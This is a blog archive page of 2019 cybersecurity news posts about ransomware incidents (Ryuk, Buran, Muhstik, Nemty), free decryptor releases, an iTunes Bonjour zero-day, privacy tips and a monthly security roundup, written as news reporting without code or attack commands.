Category Archives: ransomware

Malspam Campaign Targeted German Organizations with Buran Ransomware

Researchers spotted a malspam campaign that targeted German organizations with samples of the Buran crypto-ransomware family. In early October, Bromium observed a malspam campaign whose emails impersonated online fax service eFax. The emails contained hyperlinks to a PHP page that served up malicious Word documents. This technique helped the Word documents evade detection, as they […]… Read More

The post Malspam Campaign Targeted German Organizations with Buran Ransomware appeared first on The State of Security.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft firm has released a new free decryption tool the STOP (Djvu) ransomware, in the last months the research team helped victims of many other threats.

STOP (Djvu) ransomware has 160 variants that infected more hundreds of thousands of victims worldwide. Experts estimated a total number of 460,000 victims, that makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Divu ransomware encrypts victim’s files with Salsa20, and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decrypt software is $980, victims can receive a 50% discount if they contact the crooks in the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks, experts pointed out that some versions of STOP also bundle additional malicious payloads, including password-stealers.

The decryptor released by Emsisoft can recover for free files encrypted by 148 of the 160 variants, this means that approximately 70% of victims will be able to recover their data. Unfortunately, currently it is not possible to decrypt files encrypted by the remaining 12 variants.

Below key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Pitney Bowes revealed that its systems were infected with Ryuk Ransomware

The global shipping and mailing services company Pitney Bowes revealed that the recent partial outage was caused by the Ryuk ransomware.

The global shipping and mailing services company Pitney Bowes recently suffered a partial outage of its service caused by a ransomware attack. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

The company now published an update on the attack, it confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

“This is an update to the status of Pitney Bowes recovery from the Ryuk virus malware attack on some of our systems that disrupted client access to some of our services.” reads the update shared by the company. “Upon discovery of the attack, with the support of third-party advisors, we immediately began working on a plan and thorough process of systems restoration with the goal of restoring service as quickly as possible. We have also been reaching out to our clients, partners, and employees.”

The mailing system products were paralyzed by the attack, the company confirmed that immediately after the attack the following systems were NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company announced that currently it has restored many of the impacted systems.

The Ryuk ransomware was involved in a long string of attacks targeting cities, hospitals, and organizations worldwide.

In September New Bedford city was infected with Ryuk ransomware, but did not pay $5.3M ransom. In April, systems at Stuart City were infected by the same Ryuk ransomware, in early March, Jackson County, Georgia, was hit by the same ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – Ryuk Ransomware, Pitney Bowes)

The post Pitney Bowes revealed that its systems were infected with Ryuk Ransomware appeared first on Security Affairs.

M6 Group, largest France private multimedia group, hit by ransomware attack

M6, one of France’s biggest TV channels, hit by ransomware

Unlike The Weather Channel earlier this year, M6 remained on the air.

The M6 Group, the largest France private multimedia group, was the victim of ransomware over the weekend.

The systems at the M6 Group, France’s largest private multimedia group, were infected with the ransomware over the weekend, fortunately, none of the company’s TV and radio channels interrupted the broadcasts.

According to the French newspaper L’Express, the ransomware attack only impacted landlines and e-mail.

“The company’s phone lines and e-mail are unusable, so employees have to use their mobile phones and text messages to communicate,” an internal source told the newspaper. “all the office and management tools are in disruption.” 

The company revealed the incident took place on Saturday.

The cybersecurity staff at the M6 Group was able to immediately mitigate the threat preventing any downtime its TV channels, radio stations, and film studios.

“The M6 ​​Group was the target of a malicious computer attack on Saturday morning, and the quick and efficient intervention of our cyber security experts has helped to ensure the continued security of the Internet. good broadcasting of the programs on all our TV and radio antennas “.  reads the message posted through the Twitter account of the group.

In April, another broadcast suffered a similar incident, a cyber attack hit the Weather Channel and forced it off the air for at least 90 minutes.

In April 2015, the TV5Monde was hit by a severe cyber attack that compromised broadcasting of transmissions across its medium. The attackers also hijacked the Channel TV5Monde website and social media accounts of the French broadcaster.

Yves Bigot, at the time the director-general of TV5Monde told the BBC that the cyber-attack came close to destroying the network of the French TV and investigation suggested Russia-linked APT28 group.

Pierluigi Paganini

(SecurityAffairs – M6 Group, ransomware)

The post M6 Group, largest France private multimedia group, hit by ransomware attack appeared first on Security Affairs.

1 in 5 SMBs have fallen victim to a ransomware attack

Ransomware remains the most common cyber threat to SMBs, according to a Datto survey of more than 1,400 MSP decision makers that manage the IT systems for small-to-medium-sized businesses. SMBs are a prime target While it is used against businesses of all sizes, SMBs have become a prime target for attackers. The report uncovered a number of ransomware trends specifically impacting the SMB market: Ransomware attacks are pervasive. The number of ransomware attacks against SMBs … More

The post 1 in 5 SMBs have fallen victim to a ransomware attack appeared first on Help Net Security.

The Evolution of Phishing: The Spear Is Aimed at You

You can’t go a week without seeing a story about a data breach or ransomware hitting organizations. These breaches can be very costly, but they still continue to show up. Are the good guys not winning the cybersecurity war? Organizations invest millions of dollars in security products and services, but they keep getting breached. We […]… Read More

The post The Evolution of Phishing: The Spear Is Aimed at You appeared first on The State of Security.

Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack

The global shipping and mailing services company Pitney Bowes suffered a partial outage of its service caused by a ransomware attack.

The Pitney Bowes company announced that a ransomware attack infected its systems and cause a partial system outage that made some of its service unavailable for some customers. Pitney Bowes is a global technology company that provides commerce solutions in the areas of ecommerce, shipping, mailing, data and financial services.

“Pitney Bowes was affected by a malware attack that encrypted information on some systems and disrupted customer access to some of our services. At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” reads a press release published by the company.

“At this time, the company has seen no evidence that customer or employee data has been improperly accessed.” 

The good news is that there is no evidence that hackers accessed company information. The company has hired an external security firm to support its investigation into the security breach.

The mailing system products were paralyzed by the attack, the company confirmed that the following systems are currently NOT working:

  • Clients are unable to refill postage or upload transactions on their mailing machine
  • SendPro Online in the UK and Canada
  • Hosted instances of SendSuite Live, SendSuite Express, SendSuite Tracking (SST)
  • Accounting solutions such as Inview, Business Manager and Account List Management
  • Your Account and the Pitney Bowes Supplies web store cannot be accessed. This in turn impacts clients subscribed to AutoInk and our Supplies App

The company pointed out that even is its customers will not be able to refill their postage meter until the systems are restored, that can will be able to print postage if they have funds.

Clients with Mail360 and MIPro Licensing products have no access to Your Account, Data fulfillment, and some of our Support pages, with Software and Data Marketplace downloads being unavailable.

For Commerce Services clients, impacted solutions include Fulfillment, Delivery and Returns clients and Presort services were impacted.

The Software and Data products are not affected by the ransomware attacks because they do not access the backend systems of the Pitney Bowes network.

Customers can visit the page www.pb.com/systemupdate to receive up to date information on the incident.

Pierluigi Paganini

(SecurityAffairs – Pitney Bowes, hacking)

The post Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack appeared first on Security Affairs.

Alabama Hospital chain paid ransom to resume operations after ransomware attack

An Alabama hospital chain announced to have restored normal operation after paying the ransom request by crooks that infected its systems with ransomware.

A hospital chain in west Alabama was recently hit by a ransomware attack that paralyzed its systems. The organization opted out to pay the ransom and announced to have restored normal operation.

The hospital chain hasn’t revealed the amount it has paid to the crooks to decrypt the data, it seems that an insurance covered the cost.

Recently I reported that several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure. At the time, a joint press release published by the affected hospitals, the DCH Regional Medical Center, Northport Medical Center, and Fayette Medical Center from West Alabama’s Tuscaloosa, Northport, and Fayette, revealed that the infrastructures had limited access to their computing systems.

“The DCH Health System said its hospitals in the west Alabama cities of Tuscaloosa, Northport and Fayette resumed admitting patients Thursday, and its imaging and patient scheduling services were going back online Friday.” reads the post published by the Associated Press.

The operations at the hospitals were severely impacted for 10 days during which the hospitals kept treating people, but new patients were sent to other hospitals in Birmingham or Mississippi.

“We had to gain access to our system quickly and gain the information it was blocking,” chief operating officer Paul Betz told a news conference. “As time goes by, and we determine the full impact of this, we will be very grateful we had cyber insurance in place.”

The systems at the hospitals have been infected with a variant of the Ryuk ransomware, internal staff reverted to using paper files.

“A statement from the system said workers were still restoring some nonessential systems including email and were trying to get programs operating at full speed.” continues the post.

The three hospitals admitted more than 32,000 patients last year.

A few weeks ago, the Campbell County Memorial Hospital in Gilette, Wyoming was hit by a ransomware attack on its computer systems that caused service disruptions.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – hospitals, ransomware)

The post Alabama Hospital chain paid ransom to resume operations after ransomware attack appeared first on Security Affairs.

15 Easy, Effective Ways to Start Winning Back Your Online Privacy

NCSAM

NCSAM

Someone recently asked me what I wanted for Christmas this year, and I had to think about it for a few minutes. I certainly don’t need any more stuff. However, if I could name one gift that would make me absolutely giddy, it would be getting a chunk of my privacy back.

Like most people, the internet knows way too much about me — my age, address, phone numbers and job titles for the past 10 years, my home value, the names and ages of family members  — and I’d like to change that.

But there’s a catch: Like most people, I can’t go off the digital grid altogether because my professional life requires me to maintain an online presence. So, the more critical question is this:

How private do I want to be online?  

The answer to that question will differ for everyone. However, as the privacy conversation continues to escalate, consider a family huddle. Google each family member’s name, review search results, and decide on your comfort level with what you see. To start putting new habits in place, consider these 15 tips.

15 ways to reign in your family’s privacy

  1. Limit public sharing. Don’t share more information than necessary on any online platform, including private texts and messages. Hackers and cyber thieves mine for data around the clock.
  2. Control your digital footprint. Limit information online by a) setting social media profiles to private b) regularly editing friends lists c) deleting personal information on social profiles d) limiting app permissions someone and browser extensions e) being careful not to overshare.NCSAM
  3. Search incognito. Use your browser in private or incognito mode to reduce some tracking and auto-filling.
  4. Use secure messaging apps. While WhatsApp has plenty of safety risks for minors, in terms of data privacy, it’s a winner because it includes end-to-end encryption that prevents anyone in the middle from reading private communications.
  5. Install an ad blocker. If you don’t like the idea of third parties following you around online, and peppering your feed with personalized ads, consider installing an ad blocker.
  6. Remove yourself from data broker sites. Dozens of companies can harvest your personal information from public records online, compile it, and sell it. To delete your name and data from companies such as PeopleFinder, Spokeo, White Pages, or MyLife, make a formal request to the company (or find the opt-out button on their sites) and followup to make sure it was deleted. If you still aren’t happy with the amount of personal data online, you can also use a fee-based service such as DeleteMe.com.
  7. Be wise to scams. Don’t open strange emails, click random downloads, connect with strangers online, or send money to unverified individuals or organizations.
  8. Use bulletproof passwords. When it comes to data protection, the strength of your password, and these best practices matter.
  9. Turn off devices. When you’re finished using your laptop, smartphone, or IoT devices, turn them off to protect against rogue attacks.NCSAM
  10. Safeguard your SSN. Just because a form (doctor, college and job applications, ticket purchases) asks for your Social Security Number (SSN) doesn’t mean you have to provide it.
  11. Avoid public Wi-Fi. Public networks are targets for hackers who are hoping to intercept personal information; opt for the security of a family VPN.
  12. Purge old, unused apps and data. To strengthen security, regularly delete old data, photos, apps, emails, and unused accounts.
  13. Protect all devices. Make sure all your devices are protected viruses, malware, with reputable security software.
  14. Review bank statements. Check bank statements often for fraudulent purchases and pay special attention to small transactions.
  15. Turn off Bluetooth. Bluetooth technology is convenient, but outside sources can compromise it, so turn it off when it’s not in use.

Is it possible to keep ourselves and our children off the digital grid and lock down our digital privacy 100%? Sadly, probably not. But one thing is for sure: We can all do better by taking specific steps to build new digital habits every day.

~~~

Be Part of Something Big

October is National Cybersecurity Awareness Month (NCSAM). Become part of the effort to make sure that our online lives are as safe and secure as possible. Use the hashtags #CyberAware, #BeCyberSafe, and #NCSAM to track the conversation in real-time.

The post 15 Easy, Effective Ways to Start Winning Back Your Online Privacy appeared first on McAfee Blogs.

Researchers released a free decryptor for the Nemty Ransomware

Good news for the victims of the Nemty Ransomware, security researchers have released a free decryptor that could be used to recover files.

I have great news for the victims of the recently discovered Nemty Ransomware, security researchers have released a free decryptor tool that could be used to recover files.

In mid-August, the Nemty ransomware appeared in the threat landscape, the name of the ransomware comes after the extension it adds to the encrypted file names. The malicious code also deletes their shadow copies to make in impossible any recovery procedure.

Below the ransom note dropped by the Nemty ransomware after the encryption process is completed. Attackers demand the payment of a 0.09981 BTC ransom (roughly $1,000) through a portal hosted on the Tor network.

Nemty ransomware

Crooks used multiple attack vectors to distribute the ransomware, according to the popular malware researcher Vitali Kremez, the ransomware is mainly dropped via compromised remote desktop connections.

Now researchers from the security firm Tesorion have developed a decryptor tool that works on Nemty versions 1.4 and 1.6, they also announced a working tool for version 1.5.

The security form is also working with Europol to get its decryptors included in their NoMoreRansom project.

“As 1.6 is the most recent version of the two, we have been focussing our efforts on this version first. We now have a working decryptor for version 1.6. Please contact Tesorion CSIRT to obtain our decryptor for free if you are a victim of Nemty 1.6. We are also finishing our decryptor for Nemty 1.5 and expect to release it soon as well.” reads the post published by Tesorion.

The decryptor currently supports only a limited number of file extensions, anyway, researchers are working to improve it and support other file types.

Tesorion is not allowing victims to generate the decryption keys with their client, instead, it is allowing victims to retrieve the decryption key by generating it on its own servers.

Victims can contact the Tesorion CSIRT and request help with the Nemty Ransomware, in turn the company will then send a link to the decryptor that will allow you to decrypt the files.

“Tesorion told BleepingComputer they went this route in order to prevent the ransomware developers from analyzing the decryptor and learning the weakness in their algorithm.” reported BleepingComputer.

Victims can upload their files on the Tesorion serves that will use it to calculate the decryption key, then the key is sent back to the victims that can load is in the decryptor.

Pierluigi Paganini

(SecurityAffairs – Nemty ransomware, malware)

The post Researchers released a free decryptor for the Nemty Ransomware appeared first on Security Affairs.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind BitPaymer and ransomware attacks has been found exploiting Windows zero-day for Apple iTunes and iCloud.

The cybercriminals behind BitPaymer and iEncrypt ransomware attacks have been found exploiting a Windows zero-day vulnerability for Apple iTunes and iCloud in attacks in the wild.

The zero-day vulnerability resides in the Bonjour updater that comes packaged with Apple’s iTunes and iCloud software for Windows to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including automatically download the updates for Apple software. Experts pointed out that the Bonjour updater has its own installation entry in the installed software section and a scheduled task to execute the process. This means that even uninstalling iTunes and iCloud doesn’t remove Bonjour updater.

The experts discovered that the Bonjour updater was vulnerable to the unquoted service path vulnerability.

Unquoted search paths are a relatively older vulnerability that occurs when the path to an executable service or program (commonly uninstallers) are unquoted and contain spaces. The spaces can allow someone to place their own executable in the path and get it to be executed instead.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”

bitpaymer campaign

Experts explained that attackers using a legitimate process signed by a trusted vendor, like Bonjour, will be able to execute a new malicious child process evading detection. In this specific attack, security programs have not scanned the malicious payloads because they did not use an extension,

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges.

Morphisec Labs reported their discovery to Apple that released iCloud for Windows 10.7iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users that have installed an Apple software on their Windows computer and then uninstalled it, should manually uninstall the Bonjour updater if present.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

Cybercrime is maturing, shifting its focus to larger and more profitable targets

Cybercrime is continuing to mature and becoming more and more bold, shifting its focus to larger and more profitable targets as well as new technologies. Data is the key element in cybercrime, both from a crime and an investigate perspective. These key threats demonstrate the complexity of countering cybercrime and highlight that criminals only innovate their criminal behavior when existing modi operandi have become unsuccessful or more profitable opportunities emerge. In essence, new threats do … More

The post Cybercrime is maturing, shifting its focus to larger and more profitable targets appeared first on Help Net Security.

Ransomware victim hacks attacker, turning the tables by stealing decryption keys

Normally it works like this. Someone gets infected by ransomware, and then they pay the ransom. The victim then licks their wounds and hopefully learns something from the experience. And that’s what happened to Tobias Frömel, a German developer and web designer who found himself paying a Bitcoin ransom of 670 Euros (US $735) after […]… Read More

The post Ransomware victim hacks attacker, turning the tables by stealing decryption keys appeared first on The State of Security.

Developer hacked back Muhstik ransomware crew and released keys

One of the victims of the Muhstik ransomware gang who initially paid the ransomware, decided to hack back the crooks and released their decryption keys.

Tobias Frömel, is a German software developer, who was a victim of the Muhstik ransomware. Frömel initially paid the ransom to decrypt his files, but later decided to get his revenge on the crooks.

The expert hacked the server used by the Muhstik ransomware gang and released the decryption keys for all the victims of the group.

Muhstik is piece of ransomware that has been first detected in the wild late September while targeting QNAP network-attacked storage (NAS) devices.

Attackers first get access to the NAS devices through brute-force attacks on the built-in phpMyAdmin service, then encrypt their content and append the “.muhstik” extension to their filenames.

This ransomware targets network-attacked storage (NAS) devices made by Taiwanese hardware vendor QNAP. The gang behind the Muhstik ransomware is brute-forcing QNAP NAS devices that use weak passwords for the built-in phpMyAdmin service.

“The Muhstik ransomware is reportedly being used to target QNAP NAS devices. Devices using weak SQL server passwords and running phpMyAdmin may be more vulnerable to attacks.” states the security advisory published by QNAP.

“We strongly recommend that users act immediately to protect their data from possible malware attacks.

The developer published on Pastebin the 2,858 decryption keys found on the hacked server and clarified that he was aware that the hack back is not legal.

hope you all got that decrypter execution file, if not i still have it and yeah, I know it was not legal from me,” wrote the researcher. “I’m not the bad guy here,”

Frömel also published a decrypter that could be used by the victims of the Muhstik ransomware to unlock their files.

In the meantime, Frömel has been busy notifying Muhstik victims on Twitter about the decrypter’s availability, advising users against paying the ransom.

According to ZDNet, which first reported the news, Frömel notified authorities and also provided information to track down members of the Muhstik gang.

This case highlights the importance of working with the authorization of law enforcement before conducting hacking back.

Pierluigi Paganini

(SecurityAffairs – Muhstik ransomware, hacking)

The post Developer hacked back Muhstik ransomware crew and released keys appeared first on Security Affairs.

Decryption Keys Released by Developer of HildaCrypt Ransomware

The developer of HildaCrypt has released the master decryption keys that would allow potential victims of the ransomware to recover their data for free. On October 4, a security researcher who goes by the name “GrujaRS” posted about the discovery of a new variant of STOP, a well–known ransomware family. New #Stop (Djvu) #Ransomware extension […]… Read More

The post Decryption Keys Released by Developer of HildaCrypt Ransomware appeared first on The State of Security.

Cyber News Rundown: Data Dash

Reading Time: ~ 2 min.

DoorDash Data Breach

Nearly five months after a breach, DoorDash has just now discovered that unauthorized access to sensitive customer information has taken place. Among the stolen data were customer names, payment history, and contact info, as well as the last four digits of both customer payment cards and employee bank accounts. The compromised data spans nearly 5 million unique customers and employees of the delivery service. DoorDash has since recommended all users change their passwords immediately.

American Express Employee Fraud

At least one American Express employee was fired after it was revealed they had illicitly gained access to customer payment card data and may have been using it to commit fraud at other financial institutions. Following this incident, American Express began contacting affected customers offering credit monitoring services to prevent misuse of their data.

Hackers Target Airbus Suppliers

Several suppliers for Airbus have recently been under cyber-attack by state-sponsored hackers that seem to have a focus on the company’s VPN connections to Airbus. Both Rolls-Royce and Expleo, European manufacturers of engines and technology respectively, have been targeted for their technical documentation by Chinese aircraft competitors. This type of attack has pushed many officials to urge for higher security standards across all supply chains, as both large and small companies are now being attacked.

Ransomware Law Passes Senate

A recently passed law mandates the Department of Homeland Security support organizations affected by ransomware. While focused on protecting students in New York state, the legislation follows 50 school districts across the U.S. falling victim to ransomware attacks in 2019 alone, compromising up to 500 schools overall. A similar bill recently passed in the House of Representatives, which is expected to be combined with this legislation.

Ransomware Targets Hospitals Around the Globe

Multiple hospitals in the U.S. and Australia have fallen victim to ransomware attacks within the last month. Some sites were so affected that they were forced to permanently close their facilities after they weren’t able to rebuild patient records from encrypted backups. Several offices in Australia have been unable to accept new patients with only minimal systems for continuing operations.

The post Cyber News Rundown: Data Dash appeared first on Webroot Blog.

Educational organizations massively vulnerable to cyber attacks

The education sector is facing a crisis as schools grapple with high levels of risk exposure – driven in large part by complex IT environments and digitally savvy student populations – that have made them a prime target for cybercriminals and ransomware attackers, according to Absolute. The summer months of 2019 saw the number of publicly-disclosed security incidents in K-12 school districts in the U.S. reach 160, exceeding the total number incidents reported in 2018 … More

The post Educational organizations massively vulnerable to cyber attacks appeared first on Help Net Security.

Toronto hospital recovering from ransomware attack

A Toronto hospital is recovering after being hit last week by a variant of Ryuk ransomware. However, so far it seems the malware was only trying to exfiltrate data instead of demanding money.

Michael Garron Hospital chief executive officer Sarah Downey told CBC News that the hospital’s firewall stopped data from leaving the institution.

UPDATE: On Friday, communications director Shelley Darling said IT experts were able to confirm the malware was Ryuk by examining the malware. There was an email message for communicating with the attackers, she added. but the hospital is not contacting anyone about paying a ransom.

The hospital has over 100 servers and they are still being evaluated for infection, she said. After the attack was discovered two elective surgeries and out-patient clinics had to be rescheduled and staff had to resort to paper documentation. As of Friday morning, all email had been restored. However, some remote VPN access is still off. Certain portals that communicate with other health care data repositories are slowly being restored.  In addition,  what Darling called “minor administrative systems” — such a volunteer database — and “systems that talk to each other” are still offline.

“It’s probably going take us a few weeks to have confidence to say all of our systems are back online,” he said.

The hospital hasn’t estimated yet how much the attack will cost. Some of those costs may be recovered through insurance, Darling said.

The attack started in the early hours of Sept. 25  when what it calls a virus was discovered on one of the IT systems. As a result several systems were closed to prevent the malware, later identified as a Ryuk variant, from spreading.

Patient privacy has not been compromised, the hospital said. However, it is still in what the institution calls a Code Grey, which means IT systems have been impaired.

Darling said the suspicion so far is the attack started with an employee clicking on an infected email or going to an infected website. “In the last several days we’ve been re-educating our staff on cyber security email do’s and don’ts,” she added. There has been regular privacy training, but now “we are looking at putting more formal education in place.”

“While we hope these types of situations never take place, our expert hospital teams prepare for all issues and we have extensive processes in place to respond quickly when experiencing disruptions in clinical services,” Downey said in a statement after the attack was discovered. “We want to reassure our community that all current patients at MGH continue to receive safe, high-quality care from our health care teams.

“Our priority is to restore full computer functionality as quickly as possible and we apologize to the small number of patients whose care has been re-scheduled. I am so grateful to our staff, physicians, leaders and volunteers who have worked exceptionally hard and put in extra hours during this time to ensure safe, quality care to our community.”

Michael Garron Hospital until recently was called Toronto East General Hospital, and is one of the largest in the city. The emergency department alone sees about 80,000 patients a year.

According to a blog earlier this year from security vendor CrowdStrike, Ryuk ransomware began appearing in August 2018. Controlled by a group it dubs Grim Spider, Ryuk has been targeting large enterprises.  CrowdStrike says Ryuk was derived from the Hermes commodity ransomware, which can be bought on dark forums. However, researchers believe Ryuk is only used by the Grim Spider group.

CrowdStrike believes that the initial compromise often comes after a victim clicks on a link or a document in an email that downloads the TrickBot or Emotet trojans. But note that in June the U.K. National Cyber Security Centre published an advisory that pointed out often Ryuk isn’t spotted by victims until after some time following the initial infection, ranging from days to months.

That allows the threat actor time to carry out reconnaissance inside an infected network, identifying and targeting critical network systems. But, the advisory notes, it may also offer the potential to mitigate against a ransomware attack before it occurs, if the initial infection is detected and remedied.

In the first four months since Ryuk’s appearance the threat actors operating it netted over 705 Bitcoins across 52 transactions for a total current value of US$3,701,893.98, said CrowdStrike. Payouts have been going up ever since. According to one news report in June alone Florida municipalities hit by Ryuk paid out more than US$1.1 million dollars.

Cyber Security Roundup for September 2019

Anyone over the age of 40 in the UK will remember patiently browsing for holidays bargains on their TV via Teletext. While the TV version of Teletext Holidays died out years ago due to the creation of the world-wide-web, Teletext Holidays, a trading name of Truly Travel, continued as an online and telephone travel agent business. Verdict Media discovered an unsecured Amazon Web Services Service (Cloud Server) used by Teletext Holidays and was able to access 212,000 call centre audio recordings with their UK customers. The audio recordings were taken between 10th April and 10th August 2016 and were found in a data repository called 'speechanalytics'. Businesses neglecting to properly secure their cloud services is an evermore common culprit behind mass data breaches of late. Utilising cloud-based IT systems does not absolve businesses of their IT security responsibilities at their cloud service provider. 

Booking Holidays on Ceefax in the 1980s

Within the Teletext Holidays call recordings, customers can be heard arranging holiday bookings, providing call-centre agents partial payment card details, their full names and dates of birth of accompanying passengers. In some call recordings, Verdict Media advised customers private conversations were recorded while they were put on hold. Teletext Holidays said they have reported the data breach to the ICO.

Separately, another poorly secured cloud server was discovered with thousands of CVs originating from the Monster.com job-hunting website.  Monster.com reported the compromise of CVs was between 2014 and 2017 and was due to a 'third-party' it no longer worked with.

Wikipedia was the subject to a major DDoS attack, which impacted the availability of the online encyclopaedia website in the UK and parts of Europe. While the culprit(s) behind the DDoS attack remains unknown, Wikipedia was quick to condemn it, it said was not just about taking Wikipedia offline, "Takedown attacks threaten everyone’s fundamental rights to freely access and share information. We in the Wikimedia movement and Foundation are committed to protecting these rights for everyone."

CEO Fraud
The BBC News website published an article highlighting the all too common issue of CEO Fraud, namely company email spoofing and fraud which is costing business billions.  

Criminals are increasingly targeting UK business executives and finance staff with ‘CEO Fraud’, commonly referred to as ‘whaling’ or Business Email Compromise (BEC) by cybersecurity professionals. CEO fraud involves the impersonation of a senior company executive or a supplier, to social engineer fraudulent payments. CEO fraud phishing emails are difficult for cybersecurity defence technologies to prevent, as such emails are specifically crafted (i.e. spear phishing) for individual recipients, do not contain malware-infected attachments or malicious weblinks for cyber defences to detect and block.

Criminals do their research, gaining a thorough understanding of business executives, clients, suppliers, and even staff role and responsibilities through websites and social media sites such as LinkedIn, Facebook, and Twitter.  Once they determine who they need to target for maximum likelihood of a financial reward return, they customise a social engineering communication to an individual, typically through email, but sometimes through text messages (i.e. smishing), or over the phone, and even by postal letters to support their scam. They often create a tremendous sense of urgency, demanding an immediate action to complete a payment, impersonating someone in the business with high authority, such as the MD or CEO. The criminal’s ultimate goal is to pressurise and rush their targetted staff member into authorising and making a payment transaction to them. Such attacks are relatively simple to arrange, require little effort, and can have high financial rewards for criminals. Such attacks require little technical expertise, as email spoofing tools and instructions are freely available on the open and dark web. And thanks to the internet, fraudsters globally can effortless target UK businesses with CEO fraud scams.

UK Universities are being targetted by Iranian hackers in an attempt to steal secrets, according to the UK National Cyber Security Centre and the UK Foreign Office. The warning came after the US deputy attorney general Rod Rosenstein said: “Iranian nationals allegedly stole more than 31 terabytes of documents and data from more than 140 American universities, 30 American companies, five American government agencies, and also more than 176 universities in 21 foreign countries."

Security Updates
'Patch Tuesday' saw Microsoft release security updates for 78 security vulnerabilities, including 17 which are 'Critical' rated in Windows RDP, Azure DevOps, SharePoint and Chakra Core.  

On 23rd September 2019, Microsoft released an ‘emergency update’ (Out-of-Band) for Internet Explorer (versions 9, 10 & 11), which addresses a serious vulnerability (CVE-2019-1367) discovered by a Google researcher and is said to be known to be actively exploited.  The flaw allows an attacker to execute arbitrary code on a victim's computer through a specially crafted website, enabling an attacker to gain the same user rights as the user and to infect the computer with malware. It is a particularly dangerous exploit if the user has local administrator rights, in such instances an attacker gain full control over a user's computer remotely. This vulnerability is rated as 'Critical' by Microsoft and has a CVSS score of 7.6. Microsoft recommends that customers apply Critical updates immediately.

Ransomware
Research by AT&T Cybersecurity found 58% of IT security professionals would refuse to pay following a ransomware attack, while 31% said they would only pay as a last resort. A further 11% stated paying was, in their opinion, the easiest way to get their data back. While 40% of IT Security Pros Would Outlaw Ransomware Payments. It is clear from the latest threat intelligence reports, that the paying of ransomware ransoms is fuelling further ransomware attacks, including targetted attacks UK businesses.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
HUAWEI NEWS AND THREAT INTELLIGENCEAWARENESS, EDUCATION AND THREAT INTELLIGENCE

Ten hospitals in Alabama and Australia have been hit with ransomware attacks

A new wave of ransomware attacks hit US and Australian hospitals and health service providers causing the paralysis of their systems.

Several hospitals and health service providers from the U.S. and Australia were hit by ransomware attacks that forced the administrators to shut part of their IT infrastructure.

“Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.” reported ArsTechnica.

